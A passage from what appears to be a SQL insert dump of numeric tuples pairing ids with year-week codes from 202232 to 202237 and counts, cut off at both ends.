3531,1,'202232',3),(4275,1,'202232',3),(4301,1,'202232',3),(4387,1,'202232',3),(4428,1,'202232',3),(4542,1,'202232',3),(4612,1,'202232',3),(4648,1,'202232',3),(474,1,'202232',4),(478,1,'202232',4),(482,1,'202232',4),(486,1,'202232',4),(487,1,'202232',4),(1600,1,'202232',4),(1608,1,'202232',4),(1780,1,'202232',4),(2704,1,'202232',4),(2813,1,'202232',4),(3316,1,'202232',4),(3710,1,'202232',4),(3731,1,'202232',4),(4329,1,'202232',4),(4582,1,'202232',4),(4645,1,'202232',4),(4654,1,'202232',4),(4657,1,'202232',4),(4660,1,'202232',4),(4663,1,'202232',4),(4674,1,'202232',4),(4694,1,'202232',4),(4700,1,'202232',4),(4759,1,'202232',4),(485,1,'202232',5),(1606,1,'202232',5),(1610,1,'202232',5),(2769,1,'202232',5),(2956,1,'202232',5),(2993,1,'202232',5),(3083,1,'202232',5),(3229,1,'202232',5),(3245,1,'202232',5),(3261,1,'202232',5),(3482,1,'202232',5),(3541,1,'202232',5),(3742,1,'202232',5),(3746,1,'202232',5),(4416,1,'202232',5),(4457,1,'202232',5),(4551,1,'202232',5),(4556,1,'202232',5),(4651,1,'202232',5),(4677,1,'202232',5),(4685,1,'202232',5),(4691,1,'202232',5),(4703,1,'202232',5),(4722,1,'202232',5),(335,1,'202232',6),(1582,1,'202232',6),(1709,1,'202232',6),(1722,1,'202232',6),(2152,1,'202232',6),(2609,1,'202232',6),(3023,1,'202232',6),(3038,1,'202232',6),(3063,1,'202232',6),(3069,1,'202232',6),(3090,1,'202232',6),(3127,1,'202232',6),(3534,1,'202232',6),(3724,1,'202232',6),(4323,1,'202232',6),(4326,1,'202232',6),(4520,1,'202232',6),(4706,1,'202232',6),(4709,1,'202232',6),(4768,1,'202232',6),(84,1,'202232',7),(89,1,'202232',7),(2309,1,'202232',7),(3066,1,'202232',7),(3072,1,'202232',7),(3263,1,'202232',7),(4529,1,'202232',7),(4771,1,'202232',7),(76,1,'202232',8),(1612,1,'202232',8),(2503,1,'202232',8),(2804,1,'202232',8),(3117,1,'202232',8),(3313,1,'202232',8),(3764,1,'202232',8),(3781,1,'202232',8),(4400,1,'202232',8),(4420,1,'202232',8),(4765,1,'202232',8),(108,1,'202232',9),(1544,1,'202232',9),(1594,1,'202232',9),(2809,1,'202232',9),(4776,1,'202232',9),(87,1,'202232',10),(91,1,'202232',10),(1596,1,'202232',10),(3027,1,'202232',10),(3489,1,'202232',10),(4338,1,'202232',10),(4412,1,'202232',10),(74,1,'202232',11),(68,1,'202232',13),(1602,1,'202232',13),(3030,1,'202232',13),(1586,1,'202232',16),(72,1,'202232',19),(2904,1,'202232',23),(80,1,'202232',42),(9,1,'202232',428),(76,1,'202233',1),(87,1,'202233',1),(108,1,'202233',1),(335,1,'202233',1),(470,1,'202233',1),(473,1,'202233',1),(474,1,'202233',1),(477,1,'202233',1),(479,1,'202233',1),(480,1,'202233',1),(482,1,'202233',1),(484,1,'202233',1),(486,1,'202233',1),(487,1,'202233',1),(488,1,'202233',1),(1590,1,'202233',1),(1600,1,'202233',1),(1604,1,'202233',1),(1606,1,'202233',1),(1612,1,'202233',1),(1697,1,'202233',1),(1713,1,'202233',1),(1715,1,'202233',1),(1720,1,'202233',1),(1724,1,'202233',1),(1728,1,'202233',1),(1745,1,'202233',1),(1766,1,'202233',1),(1770,1,'202233',1),(1774,1,'202233',1),(1776,1,'202233',1),(1780,1,'202233',1),(2297,1,'202233',1),(2658,1,'202233',1),(2704,1,'202233',1),(2809,1,'202233',1),(2965,1,'202233',1),(3005,1,'202233',1),(3006,1,'202233',1),(3027,1,'202233',1),(3034,1,'202233',1),(3063,1,'202233',1),(3079,1,'202233',1),(3087,1,'202233',1),(3092,1,'202233',1),(3096,1,'202233',1),(3097,1,'202233',1),(3117,1,'202233',1),(3124,1,'202233',1),(3229,1,'202233',1),(3253,1,'202233',1),(3259,1,'202233',1),(3263,1,'202233',1),(3280,1,'202233',1),(3313,1,'202233',1),(3430,1,'202233',1),(3438,1,'202233',1),(3479,1,'202233',1),(3541,1,'202233',1),(3714,1,'202233',1),(3724,1,'202233',1),(3735,1,'202233',1),(3738,1,'202233',1),(3771,1,'202233',1),(4275,1,'202233',1),(4301,1,'202233',1),(4332,1,'202233',1),(4335,1,'202233',1),(4338,1,'202233',1),(4404,1,'202233',1),(4408,1,'202233',1),(4416,1,'202233',1),(4428,1,'202233',1),(4432,1,'202233',1),(4436,1,'202233',1),(4454,1,'202233',1),(4517,1,'202233',1),(4542,1,'202233',1),(4546,1,'202233',1),(4566,1,'202233',1),(4582,1,'202233',1),(4645,1,'202233',1),(4660,1,'202233',1),(4663,1,'202233',1),(4674,1,'202233',1),(4681,1,'202233',1),(4685,1,'202233',1),(4700,1,'202233',1),(4703,1,'202233',1),(4741,1,'202233',1),(4756,1,'202233',1),(4768,1,'202233',1),(4866,1,'202233',1),(4878,1,'202233',1),(4883,1,'202233',1),(467,1,'202233',2),(469,1,'202233',2),(471,1,'202233',2),(472,1,'202233',2),(476,1,'202233',2),(478,1,'202233',2),(481,1,'202233',2),(483,1,'202233',2),(1584,1,'202233',2),(1602,1,'202233',2),(1705,1,'202233',2),(1718,1,'202233',2),(1743,1,'202233',2),(1747,1,'202233',2),(1749,1,'202233',2),(1778,1,'202233',2),(2150,1,'202233',2),(2161,1,'202233',2),(2165,1,'202233',2),(2248,1,'202233',2),(2252,1,'202233',2),(2309,1,'202233',2),(2503,1,'202233',2),(2617,1,'202233',2),(2801,1,'202233',2),(3041,1,'202233',2),(3045,1,'202233',2),(3060,1,'202233',2),(3083,1,'202233',2),(3090,1,'202233',2),(3104,1,'202233',2),(3127,1,'202233',2),(3269,1,'202233',2),(3287,1,'202233',2),(3498,1,'202233',2),(3721,1,'202233',2),(3731,1,'202233',2),(3752,1,'202233',2),(4424,1,'202233',2),(4448,1,'202233',2),(4514,1,'202233',2),(4524,1,'202233',2),(4529,1,'202233',2),(4668,1,'202233',2),(4677,1,'202233',2),(4691,1,'202233',2),(4694,1,'202233',2),(4709,1,'202233',2),(4722,1,'202233',2),(4762,1,'202233',2),(4765,1,'202233',2),(4771,1,'202233',2),(4792,1,'202233',2),(4802,1,'202233',2),(4858,1,'202233',2),(4870,1,'202233',2),(4874,1,'202233',2),(4888,1,'202233',2),(4893,1,'202233',2),(4930,1,'202233',2),(68,1,'202233',3),(1588,1,'202233',3),(1608,1,'202233',3),(1614,1,'202233',3),(1703,1,'202233',3),(1707,1,'202233',3),(2156,1,'202233',3),(2296,1,'202233',3),(2964,1,'202233',3),(3261,1,'202233',3),(4520,1,'202233',3),(4657,1,'202233',3),(4753,1,'202233',3),(4897,1,'202233',3),(72,1,'202233',4),(84,1,'202233',4),(89,1,'202233',4),(485,1,'202233',4),(1711,1,'202233',4),(1722,1,'202233',4),(2159,1,'202233',4),(3781,1,'202233',4),(4391,1,'202233',4),(4797,1,'202233',4),(4862,1,'202233',4),(91,1,'202233',5),(2769,1,'202233',5),(3764,1,'202233',5),(1594,1,'202233',6),(1596,1,'202233',6),(2904,1,'202233',6),(1586,1,'202233',9),(1582,1,'202233',10),(80,1,'202233',13),(9,1,'202233',223),(2148,1,'202234',1),(110,1,'202234',2),(1590,1,'202234',2),(1699,1,'202234',2),(1734,1,'202234',2),(1751,1,'202234',2),(3069,1,'202234',2),(3092,1,'202234',2),(3249,1,'202234',2),(3253,1,'202234',2),(3257,1,'202234',2),(3265,1,'202234',2),(3269,1,'202234',2),(3271,1,'202234',2),(3273,1,'202234',2),(3285,1,'202234',2),(3735,1,'202234',2),(4329,1,'202234',2),(4363,1,'202234',2),(4408,1,'202234',2),(4436,1,'202234',2),(4674,1,'202234',2),(484,1,'202234',3),(1695,1,'202234',3),(1697,1,'202234',3),(1707,1,'202234',3),(1718,1,'202234',3),(1720,1,'202234',3),(1776,1,'202234',3),(1778,1,'202234',3),(2154,1,'202234',3),(2161,1,'202234',3),(2293,1,'202234',3),(2993,1,'202234',3),(3034,1,'202234',3),(3079,1,'202234',3),(3096,1,'202234',3),(3097,1,'202234',3),(3104,1,'202234',3),(3124,1,'202234',3),(3226,1,'202234',3),(3240,1,'202234',3),(3267,1,'202234',3),(3275,1,'202234',3),(3282,1,'202234',3),(3287,1,'202234',3),(3297,1,'202234',3),(3307,1,'202234',3),(3489,1,'202234',3),(3541,1,'202234',3),(3749,1,'202234',3),(3771,1,'202234',3),(4326,1,'202234',3),(4357,1,'202234',3),(4373,1,'202234',3),(4382,1,'202234',3),(4432,1,'202234',3),(4440,1,'202234',3),(4582,1,'202234',3),(4654,1,'202234',3),(4657,1,'202234',3),(4660,1,'202234',3),(4668,1,'202234',3),(4681,1,'202234',3),(4688,1,'202234',3),(482,1,'202234',4),(1592,1,'202234',4),(1701,1,'202234',4),(1711,1,'202234',4),(1713,1,'202234',4),(1715,1,'202234',4),(1722,1,'202234',4),(1726,1,'202234',4),(1732,1,'202234',4),(1747,1,'202234',4),(1770,1,'202234',4),(1772,1,'202234',4),(1782,1,'202234',4),(2063,1,'202234',4),(2178,1,'202234',4),(2704,1,'202234',4),(2751,1,'202234',4),(2801,1,'202234',4),(2911,1,'202234',4),(2965,1,'202234',4),(2989,1,'202234',4),(2991,1,'202234',4),(3027,1,'202234',4),(3102,1,'202234',4),(3109,1,'202234',4),(3243,1,'202234',4),(3247,1,'202234',4),(3251,1,'202234',4),(3259,1,'202234',4),(3261,1,'202234',4),(3531,1,'202234',4),(3724,1,'202234',4),(3727,1,'202234',4),(3731,1,'202234',4),(3774,1,'202234',4),(4377,1,'202234',4),(4428,1,'202234',4),(4517,1,'202234',4),(4587,1,'202234',4),(4645,1,'202234',4),(4663,1,'202234',4),(4685,1,'202234',4),(4691,1,'202234',4),(4709,1,'202234',4),(4712,1,'202234',4),(4722,1,'202234',4),(4741,1,'202234',4),(4753,1,'202234',4),(4878,1,'202234',4),(4893,1,'202234',4),(477,1,'202234',5),(480,1,'202234',5),(481,1,'202234',5),(483,1,'202234',5),(570,1,'202234',5),(1737,1,'202234',5),(1749,1,'202234',5),(1766,1,'202234',5),(2150,1,'202234',5),(2156,1,'202234',5),(2248,1,'202234',5),(2964,1,'202234',5),(3004,1,'202234',5),(3005,1,'202234',5),(3072,1,'202234',5),(3087,1,'202234',5),(3107,1,'202234',5),(3280,1,'202234',5),(3313,1,'202234',5),(3430,1,'202234',5),(3534,1,'202234',5),(4332,1,'202234',5),(4338,1,'202234',5),(4368,1,'202234',5),(4387,1,'202234',5),(4396,1,'202234',5),(4404,1,'202234',5),(4514,1,'202234',5),(4546,1,'202234',5),(4566,1,'202234',5),(4608,1,'202234',5),(4648,1,'202234',5),(4651,1,'202234',5),(4694,1,'202234',5),(4700,1,'202234',5),(4703,1,'202234',5),(4706,1,'202234',5),(4866,1,'202234',5),(4888,1,'202234',5),(102,1,'202234',6),(106,1,'202234',6),(478,1,'202234',6),(479,1,'202234',6),(485,1,'202234',6),(486,1,'202234',6),(1606,1,'202234',6),(1705,1,'202234',6),(1730,1,'202234',6),(1774,1,'202234',6),(1780,1,'202234',6),(2152,1,'202234',6),(2457,1,'202234',6),(2558,1,'202234',6),(2658,1,'202234',6),(2804,1,'202234',6),(2813,1,'202234',6),(2956,1,'202234',6),(3023,1,'202234',6),(3038,1,'202234',6),(3041,1,'202234',6),(3045,1,'202234',6),(3117,1,'202234',6),(3263,1,'202234',6),(3290,1,'202234',6),(3316,1,'202234',6),(3486,1,'202234',6),(3714,1,'202234',6),(3738,1,'202234',6),(3742,1,'202234',6),(3777,1,'202234',6),(4301,1,'202234',6),(4335,1,'202234',6),(4400,1,'202234',6),(4412,1,'202234',6),(4448,1,'202234',6),(4454,1,'202234',6),(4457,1,'202234',6),(4556,1,'202234',6),(4591,1,'202234',6),(4677,1,'202234',6),(4697,1,'202234',6),(4744,1,'202234',6),(4750,1,'202234',6),(4762,1,'202234',6),(4858,1,'202234',6),(4897,1,'202234',6),(468,1,'202234',7),(469,1,'202234',7),(471,1,'202234',7),(473,1,'202234',7),(476,1,'202234',7),(487,1,'202234',7),(488,1,'202234',7),(1582,1,'202234',7),(1724,1,'202234',7),(1728,1,'202234',7),(1739,1,'202234',7),(1743,1,'202234',7),(2165,1,'202234',7),(2252,1,'202234',7),(2297,1,'202234',7),(2748,1,'202234',7),(2775,1,'202234',7),(3030,1,'202234',7),(3066,1,'202234',7),(3083,1,'202234',7),(3090,1,'202234',7),(3278,1,'202234',7),(3746,1,'202234',7),(3752,1,'202234',7),(4238,1,'202234',7),(4391,1,'202234',7),(4416,1,'202234',7),(4444,1,'202234',7),(4529,1,'202234',7),(4551,1,'202234',7),(4612,1,'202234',7),(4747,1,'202234',7),(4883,1,'202234',7),(1584,1,'202234',8),(1703,1,'202234',8),(1741,1,'202234',8),(1745,1,'202234',8),(1768,1,'202234',8),(2296,1,'202234',8),(3006,1,'202234',8),(3060,1,'202234',8),(3063,1,'202234',8),(3127,1,'202234',8),(3245,1,'202234',8),(3438,1,'202234',8),(3482,1,'202234',8),(3498,1,'202234',8),(3710,1,'202234',8),(3721,1,'202234',8),(4275,1,'202234',8),(4341,1,'202234',8),(4420,1,'202234',8),(4542,1,'202234',8),(4759,1,'202234',8),(74,1,'202234',9),(472,1,'202234',9),(474,1,'202234',9),(1598,1,'202234',9),(1604,1,'202234',9),(2609,1,'202234',9),(2617,1,'202234',9),(3229,1,'202234',9),(4323,1,'202234',9),(4520,1,'202234',9),(4756,1,'202234',9),(4870,1,'202234',9),(335,1,'202234',10),(470,1,'202234',10),(1588,1,'202234',10),(1608,1,'202234',10),(1610,1,'202234',10),(1709,1,'202234',10),(3479,1,'202234',10),(4424,1,'202234',10),(4524,1,'202234',10),(87,1,'202234',11),(1614,1,'202234',11),(2159,1,'202234',11),(2309,1,'202234',11),(2503,1,'202234',11),(2769,1,'202234',11),(2809,1,'202234',11),(3781,1,'202234',11),(4802,1,'202234',11),(1594,1,'202234',12),(1612,1,'202234',12),(4765,1,'202234',12),(4768,1,'202234',12),(4771,1,'202234',12),(4797,1,'202234',12),(4862,1,'202234',12),(4874,1,'202234',12),(4977,1,'202234',12),(91,1,'202234',13),(4792,1,'202234',13),(4976,1,'202234',13),(84,1,'202234',14),(89,1,'202234',14),(108,1,'202234',14),(1600,1,'202234',14),(4776,1,'202234',14),(4930,1,'202234',14),(4980,1,'202234',14),(4988,1,'202234',14),(76,1,'202234',15),(3764,1,'202234',15),(68,1,'202234',16),(4983,1,'202234',17),(467,1,'202234',20),(1544,1,'202234',20),(1596,1,'202234',21),(1602,1,'202234',21),(72,1,'202234',33),(2904,1,'202234',33),(1586,1,'202234',46),(80,1,'202234',68),(9,1,'202234',694),(1701,1,'202235',1),(1703,1,'202235',1),(1726,1,'202235',1),(1743,1,'202235',1),(1768,1,'202235',1),(1772,1,'202235',1),(2152,1,'202235',1),(2165,1,'202235',1),(2965,1,'202235',1),(2993,1,'202235',1),(3004,1,'202235',1),(3079,1,'202235',1),(3229,1,'202235',1),(3240,1,'202235',1),(3243,1,'202235',1),(3247,1,'202235',1),(3249,1,'202235',1),(3259,1,'202235',1),(3265,1,'202235',1),(3275,1,'202235',1),(3482,1,'202235',1),(3486,1,'202235',1),(3541,1,'202235',1),(4382,1,'202235',1),(4387,1,'202235',1),(4424,1,'202235',1),(4448,1,'202235',1),(4514,1,'202235',1),(106,1,'202235',2),(473,1,'202235',2),(1592,1,'202235',2),(1604,1,'202235',2),(1705,1,'202235',2),(1707,1,'202235',2),(1720,1,'202235',2),(1730,1,'202235',2),(1739,1,'202235',2),(1749,1,'202235',2),(1774,1,'202235',2),(1780,1,'202235',2),(1782,1,'202235',2),(2063,1,'202235',2),(2148,1,'202235',2),(2150,1,'202235',2),(2161,1,'202235',2),(2252,1,'202235',2),(2293,1,'202235',2),(2297,1,'202235',2),(2617,1,'202235',2),(2775,1,'202235',2),(2956,1,'202235',2),(2991,1,'202235',2),(3083,1,'202235',2),(3087,1,'202235',2),(3104,1,'202235',2),(3109,1,'202235',2),(3226,1,'202235',2),(3251,1,'202235',2),(3263,1,'202235',2),(3267,1,'202235',2),(3269,1,'202235',2),(3273,1,'202235',2),(3285,1,'202235',2),(3721,1,'202235',2),(4363,1,'202235',2),(4368,1,'202235',2),(4444,1,'202235',2),(4668,1,'202235',2),(4750,1,'202235',2),(477,1,'202235',3),(479,1,'202235',3),(480,1,'202235',3),(483,1,'202235',3),(484,1,'202235',3),(486,1,'202235',3),(488,1,'202235',3),(1590,1,'202235',3),(1695,1,'202235',3),(1699,1,'202235',3),(1709,1,'202235',3),(1713,1,'202235',3),(1715,1,'202235',3),(1718,1,'202235',3),(1732,1,'202235',3),(1734,1,'202235',3),(1741,1,'202235',3),(1745,1,'202235',3),(1747,1,'202235',3),(1751,1,'202235',3),(1778,1,'202235',3),(2154,1,'202235',3),(2156,1,'202235',3),(2457,1,'202235',3),(2704,1,'202235',3),(2751,1,'202235',3),(2801,1,'202235',3),(3006,1,'202235',3),(3023,1,'202235',3),(3034,1,'202235',3),(3041,1,'202235',3),(3063,1,'202235',3),(3097,1,'202235',3),(3107,1,'202235',3),(3253,1,'202235',3),(3278,1,'202235',3),(3280,1,'202235',3),(3282,1,'202235',3),(3307,1,'202235',3),(3316,1,'202235',3),(3479,1,'202235',3),(3498,1,'202235',3),(3714,1,'202235',3),(4275,1,'202235',3),(4332,1,'202235',3),(4341,1,'202235',3),(4391,1,'202235',3),(4396,1,'202235',3),(4404,1,'202235',3),(4408,1,'202235',3),(4428,1,'202235',3),(4454,1,'202235',3),(4517,1,'202235',3),(4648,1,'202235',3),(4681,1,'202235',3),(4688,1,'202235',3),(4747,1,'202235',3),(4762,1,'202235',3),(102,1,'202235',4),(468,1,'202235',4),(471,1,'202235',4),(474,1,'202235',4),(482,1,'202235',4),(485,1,'202235',4),(1608,1,'202235',4),(1711,1,'202235',4),(1737,1,'202235',4),(2178,1,'202235',4),(2248,1,'202235',4),(2609,1,'202235',4),(2658,1,'202235',4),(2813,1,'202235',4),(2964,1,'202235',4),(2989,1,'202235',4),(3005,1,'202235',4),(3092,1,'202235',4),(3245,1,'202235',4),(3257,1,'202235',4),(3297,1,'202235',4),(3430,1,'202235',4),(3438,1,'202235',4),(3489,1,'202235',4),(3531,1,'202235',4),(3534,1,'202235',4),(3727,1,'202235',4),(3735,1,'202235',4),(3749,1,'202235',4),(3771,1,'202235',4),(3774,1,'202235',4),(4238,1,'202235',4),(4301,1,'202235',4),(4335,1,'202235',4),(4357,1,'202235',4),(4373,1,'202235',4),(4377,1,'202235',4),(4432,1,'202235',4),(4524,1,'202235',4),(4587,1,'202235',4),(4591,1,'202235',4),(4612,1,'202235',4),(4712,1,'202235',4),(4741,1,'202235',4),(4792,1,'202235',4),(472,1,'202235',5),(476,1,'202235',5),(478,1,'202235',5),(481,1,'202235',5),(1584,1,'202235',5),(1598,1,'202235',5),(1697,1,'202235',5),(1722,1,'202235',5),(1770,1,'202235',5),(1776,1,'202235',5),(2309,1,'202235',5),(2558,1,'202235',5),(2748,1,'202235',5),(2769,1,'202235',5),(3038,1,'202235',5),(3102,1,'202235',5),(3261,1,'202235',5),(3271,1,'202235',5),(3290,1,'202235',5),(3738,1,'202235',5),(4542,1,'202235',5),(4551,1,'202235',5),(4556,1,'202235',5),(4756,1,'202235',5),(4802,1,'202235',5),(4874,1,'202235',5),(4883,1,'202235',5),(1600,1,'202235',6),(1728,1,'202235',6),(2296,1,'202235',6),(2911,1,'202235',6),(3045,1,'202235',6),(3072,1,'202235',6),(3090,1,'202235',6),(3124,1,'202235',6),(3724,1,'202235',6),(3752,1,'202235',6),(3777,1,'202235',6),(4753,1,'202235',6),(4759,1,'202235',6),(4765,1,'202235',6),(4797,1,'202235',6),(4858,1,'202235',6),(4862,1,'202235',6),(4878,1,'202235',6),(487,1,'202235',7),(1614,1,'202235',7),(1724,1,'202235',7),(1766,1,'202235',7),(3731,1,'202235',7),(3746,1,'202235',7),(4416,1,'202235',7),(4546,1,'202235',7),(4566,1,'202235',7),(4608,1,'202235',7),(4776,1,'202235',7),(4866,1,'202235',7),(4870,1,'202235',7),(4893,1,'202235',7),(1602,1,'202235',8),(2159,1,'202235',8),(3060,1,'202235',8),(4329,1,'202235',8),(4412,1,'202235',8),(4436,1,'202235',8),(4529,1,'202235',8),(4706,1,'202235',8),(469,1,'202235',9),(470,1,'202235',9),(1594,1,'202235',9),(1606,1,'202235',9),(4440,1,'202235',9),(4977,1,'202235',9),(74,1,'202235',10),(1582,1,'202235',10),(1610,1,'202235',10),(3027,1,'202235',10),(3127,1,'202235',10),(4326,1,'202235',10),(4420,1,'202235',10),(4457,1,'202235',10),(4663,1,'202235',10),(4674,1,'202235',10),(4691,1,'202235',10),(4703,1,'202235',10),(4722,1,'202235',10),(4744,1,'202235',10),(4768,1,'202235',10),(4897,1,'202235',10),(87,1,'202235',11),(467,1,'202235',11),(3742,1,'202235',11),(3781,1,'202235',11),(4323,1,'202235',11),(4338,1,'202235',11),(4685,1,'202235',11),(4697,1,'202235',11),(4709,1,'202235',11),(4888,1,'202235',11),(4980,1,'202235',11),(4983,1,'202235',11),(1588,1,'202235',12),(2503,1,'202235',12),(2809,1,'202235',12),(4400,1,'202235',12),(4677,1,'202235',12),(4700,1,'202235',12),(4930,1,'202235',12),(335,1,'202235',13),(3066,1,'202235',13),(3117,1,'202235',13),(3313,1,'202235',13),(4582,1,'202235',13),(4651,1,'202235',13),(4657,1,'202235',13),(4694,1,'202235',13),(3069,1,'202235',14),(3710,1,'202235',14),(4520,1,'202235',14),(4976,1,'202235',14),(76,1,'202235',15),(2804,1,'202235',15),(4645,1,'202235',15),(84,1,'202235',16),(1612,1,'202235',16),(3030,1,'202235',16),(3764,1,'202235',16),(4654,1,'202235',16),(89,1,'202235',17),(108,1,'202235',17),(4660,1,'202235',17),(4771,1,'202235',17),(1544,1,'202235',19),(1596,1,'202235',19),(570,1,'202235',20),(2904,1,'202235',20),(91,1,'202235',22),(4988,1,'202235',24),(68,1,'202235',26),(72,1,'202235',26),(1586,1,'202235',27),(80,1,'202235',69),(9,1,'202235',653),(1699,1,'202236',1),(1711,1,'202236',1),(1732,1,'202236',1),(1739,1,'202236',1),(1741,1,'202236',1),(1743,1,'202236',1),(1747,1,'202236',1),(3034,1,'202236',1),(102,1,'202236',2),(106,1,'202236',2),(1695,1,'202236',2),(1697,1,'202236',2),(1701,1,'202236',2),(1707,1,'202236',2),(1709,1,'202236',2),(1730,1,'202236',2),(1737,1,'202236',2),(1751,1,'202236',2),(1772,1,'202236',2),(1780,1,'202236',2),(1782,1,'202236',2),(2159,1,'202236',2),(2248,1,'202236',2),(2252,1,'202236',2),(2293,1,'202236',2),(2964,1,'202236',2),(3005,1,'202236',2),(3087,1,'202236',2),(3097,1,'202236',2),(3273,1,'202236',2),(3290,1,'202236',2),(3721,1,'202236',2),(4373,1,'202236',2),(4377,1,'202236',2),(4396,1,'202236',2),(4432,1,'202236',2),(4436,1,'202236',2),(4648,1,'202236',2),(4712,1,'202236',2),(4797,1,'202236',2),(1592,1,'202236',3),(1604,1,'202236',3),(1705,1,'202236',3),(1713,1,'202236',3),(1715,1,'202236',3),(1720,1,'202236',3),(1749,1,'202236',3),(1776,1,'202236',3),(1778,1,'202236',3),(2152,1,'202236',3),(2296,1,'202236',3),(2309,1,'202236',3),(2558,1,'202236',3),(2993,1,'202236',3),(3004,1,'202236',3),(3023,1,'202236',3),(3038,1,'202236',3),(3063,1,'202236',3),(3104,1,'202236',3),(3109,1,'202236',3),(3226,1,'202236',3),(3240,1,'202236',3),(3247,1,'202236',3),(3285,1,'202236',3),(3297,1,'202236',3),(3316,1,'202236',3),(3430,1,'202236',3),(3438,1,'202236',3),(3482,1,'202236',3),(3486,1,'202236',3),(3749,1,'202236',3),(3771,1,'202236',3),(3777,1,'202236',3),(4357,1,'202236',3),(4404,1,'202236',3),(4408,1,'202236',3),(4444,1,'202236',3),(4517,1,'202236',3),(4591,1,'202236',3),(4681,1,'202236',3),(4741,1,'202236',3),(470,1,'202236',4),(474,1,'202236',4),(482,1,'202236',4),(483,1,'202236',4),(1734,1,'202236',4),(1768,1,'202236',4),(2150,1,'202236',4),(2165,1,'202236',4),(2457,1,'202236',4),(2751,1,'202236',4),(2775,1,'202236',4),(2801,1,'202236',4),(2911,1,'202236',4),(2956,1,'202236',4),(2965,1,'202236',4),(2991,1,'202236',4),(3041,1,'202236',4),(3060,1,'202236',4),(3072,1,'202236',4),(3124,1,'202236',4),(3229,1,'202236',4),(3269,1,'202236',4),(3271,1,'202236',4),(3278,1,'202236',4),(3280,1,'202236',4),(3282,1,'202236',4),(3727,1,'202236',4),(3746,1,'202236',4),(3774,1,'202236',4),(4275,1,'202236',4),(4301,1,'202236',4),(4329,1,'202236',4),(4363,1,'202236',4),(4368,1,'202236',4),(4391,1,'202236',4),(4416,1,'202236',4),(4424,1,'202236',4),(4448,1,'202236',4),(4454,1,'202236',4),(4514,1,'202236',4),(4556,1,'202236',4),(4566,1,'202236',4),(4612,1,'202236',4),(4747,1,'202236',4),(4792,1,'202236',4),(4858,1,'202236',4),(4862,1,'202236',4),(4870,1,'202236',4),(4883,1,'202236',4),(4897,1,'202236',4),(110,1,'202236',5),(471,1,'202236',5),(473,1,'202236',5),(478,1,'202236',5),(479,1,'202236',5),(480,1,'202236',5),(485,1,'202236',5),(486,1,'202236',5),(488,1,'202236',5),(1590,1,'202236',5),(1614,1,'202236',5),(1703,1,'202236',5),(1722,1,'202236',5),(1770,1,'202236',5),(2063,1,'202236',5),(2178,1,'202236',5),(2989,1,'202236',5),(3006,1,'202236',5),(3083,1,'202236',5),(3090,1,'202236',5),(3092,1,'202236',5),(3096,1,'202236',5),(3107,1,'202236',5),(3245,1,'202236',5),(3257,1,'202236',5),(3265,1,'202236',5),(3287,1,'202236',5),(3307,1,'202236',5),(3479,1,'202236',5),(3541,1,'202236',5),(3714,1,'202236',5),(3738,1,'202236',5),(4332,1,'202236',5),(4341,1,'202236',5),(4387,1,'202236',5),(4542,1,'202236',5),(4546,1,'202236',5),(4608,1,'202236',5),(4668,1,'202236',5),(4759,1,'202236',5),(4802,1,'202236',5),(4878,1,'202236',5),(4893,1,'202236',5),(481,1,'202236',6),(1724,1,'202236',6),(1728,1,'202236',6),(2154,1,'202236',6),(2161,1,'202236',6),(2609,1,'202236',6),(2617,1,'202236',6),(2658,1,'202236',6),(2748,1,'202236',6),(2813,1,'202236',6),(3079,1,'202236',6),(3249,1,'202236',6),(3251,1,'202236',6),(3259,1,'202236',6),(3498,1,'202236',6),(3531,1,'202236',6),(3731,1,'202236',6),(3752,1,'202236',6),(4238,1,'202236',6),(4524,1,'202236',6),(4587,1,'202236',6),(4750,1,'202236',6),(4765,1,'202236',6),(4866,1,'202236',6),(4874,1,'202236',6),(4888,1,'202236',6),(468,1,'202236',7),(472,1,'202236',7),(476,1,'202236',7),(477,1,'202236',7),(1584,1,'202236',7),(2148,1,'202236',7),(2704,1,'202236',7),(3102,1,'202236',7),(3253,1,'202236',7),(3267,1,'202236',7),(3275,1,'202236',7),(3724,1,'202236',7),(4335,1,'202236',7),(4382,1,'202236',7),(4688,1,'202236',7),(4753,1,'202236',7),(4756,1,'202236',7),(4762,1,'202236',7),(4768,1,'202236',7),(484,1,'202236',8),(1606,1,'202236',8),(1718,1,'202236',8),(1774,1,'202236',8),(2297,1,'202236',8),(3127,1,'202236',8),(3243,1,'202236',8),(3261,1,'202236',8),(3534,1,'202236',8),(4776,1,'202236',8),(4977,1,'202236',8),(467,1,'202236',9),(469,1,'202236',9),(487,1,'202236',9),(1582,1,'202236',9),(1745,1,'202236',9),(1766,1,'202236',9),(2769,1,'202236',9),(3045,1,'202236',9),(3263,1,'202236',9),(3489,1,'202236',9),(4551,1,'202236',9),(4582,1,'202236',9),(74,1,'202236',10),(1588,1,'202236',10),(1608,1,'202236',10),(3027,1,'202236',10),(3117,1,'202236',10),(3735,1,'202236',10),(4412,1,'202236',10),(4651,1,'202236',10),(4663,1,'202236',10),(4677,1,'202236',10),(4691,1,'202236',10),(4709,1,'202236',10),(4722,1,'202236',10),(3742,1,'202236',11),(4645,1,'202236',11),(4700,1,'202236',11),(1544,1,'202236',12),(2804,1,'202236',12),(3710,1,'202236',12),(4440,1,'202236',12),(4654,1,'202236',12),(4657,1,'202236',12),(4674,1,'202236',12),(4685,1,'202236',12),(4697,1,'202236',12),(4703,1,'202236',12),(4980,1,'202236',12),(108,1,'202236',13),(335,1,'202236',13),(1600,1,'202236',13),(2809,1,'202236',13),(3030,1,'202236',13),(3066,1,'202236',13),(3069,1,'202236',13),(3313,1,'202236',13),(4326,1,'202236',13),(4529,1,'202236',13),(4660,1,'202236',13),(4694,1,'202236',13),(4744,1,'202236',13),(4976,1,'202236',13),(4988,1,'202236',13),(570,1,'202236',14),(1598,1,'202236',14),(4400,1,'202236',14),(4706,1,'202236',14),(4983,1,'202236',14),(1594,1,'202236',15),(4323,1,'202236',15),(4420,1,'202236',15),(4457,1,'202236',15),(84,1,'202236',16),(87,1,'202236',16),(4520,1,'202236',16),(4771,1,'202236',16),(1602,1,'202236',17),(3764,1,'202236',17),(4338,1,'202236',17),(89,1,'202236',18),(2503,1,'202236',18),(72,1,'202236',20),(1612,1,'202236',20),(91,1,'202236',21),(1610,1,'202236',22),(76,1,'202236',23),(4930,1,'202236',24),(68,1,'202236',25),(4996,1,'202236',25),(3781,1,'202236',26),(1596,1,'202236',27),(2904,1,'202236',33),(1586,1,'202236',57),(80,1,'202236',72),(9,1,'202236',672),(106,1,'202237',1),(479,1,'202237',1),(1747,1,'202237',1),(1782,1,'202237',1),(2148,1,'202237',1),(3092,1,'202237',1),(3229,1,'202237',1),(3249,1,'202237',1),(3251,1,